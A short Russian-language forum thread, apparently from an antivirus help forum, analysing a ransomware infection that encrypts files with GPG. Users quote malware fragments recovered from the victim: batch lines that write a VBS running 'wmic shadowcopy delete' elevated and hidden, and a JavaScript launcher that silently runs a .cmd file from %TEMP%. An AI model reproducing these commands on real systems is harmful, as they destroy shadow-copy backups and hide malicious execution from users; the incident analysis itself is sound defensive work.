Цитата |
---|
santy написал: pubring.gpg обычно не перезаписывается мусором, и не удаляется. а вот secring.gpg по алгоритму прежде чем удалить, забивают полезную инфу мусором. |
Цитата |
---|
santy написал: pubring.gpg обычно не перезаписывается мусором, и не удаляется. а вот secring.gpg по алгоритму прежде чем удалить, забивают полезную инфу мусором. |
Код |
---|
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\59665d79.vbs" echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\59665d79.vbs" echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\59665d79.vbs" echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\59665d79.vbs" |
Цитата |
---|
santy написал: Станислав, если не трудно, добавьте судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились |
Цитата |
---|
echo var cdp="%%TEMP%%\\05542988.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\27ddf88e.js" |